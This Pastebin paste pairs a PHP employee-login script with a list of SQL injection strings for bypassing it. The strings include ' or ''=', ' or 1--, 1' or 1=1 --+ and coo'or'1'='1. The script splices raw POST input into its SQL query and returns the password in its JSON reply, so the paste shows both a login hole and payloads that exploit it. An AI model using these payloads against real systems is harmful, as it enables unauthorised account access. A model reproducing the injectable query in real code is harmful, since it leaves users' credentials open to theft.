Guest User

Untitled

a guest
Aug 31st, 2018
196
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.66 KB | None | 0 0
  1. Username : ' or ''='
  2. Password : ' or ''='
  3.  
  4. Username : ' or 1--
  5. Password :
  6.  
  7. <?php
  8. require_once('conn.php');
  9.  
  10. $empID = $_POST['empID'];
  11. $password = $_POST['password'];
  12. $qry = mysql_query("SELECT * FROM `sf_ohem_login` WHERE empID='$empID' && password='$password'") ;
  13. $num = mysql_num_rows($qry);
  14. if($num==0)
  15. {
  16. $data["login"]="false";
  17. $data["empID"]= $empID;
  18. $data["msg"]="Login failed due to wrong credentials";
  19. }
  20. else
  21. {
  22. $data["login"]="true";
  23. $data["empID"]= $empID;
  24. $data["password"]= $password;
  25. }
  26. echo json_encode($data);
  27.  
  28. 1' or 1=1 --+
  29.  
  30. empID='1' or 1=1 --+
  31.  
  32. empID= coo'or'1'='1
  33. password= coo'or'1'='1
Add Comment
Please, Sign In to add comment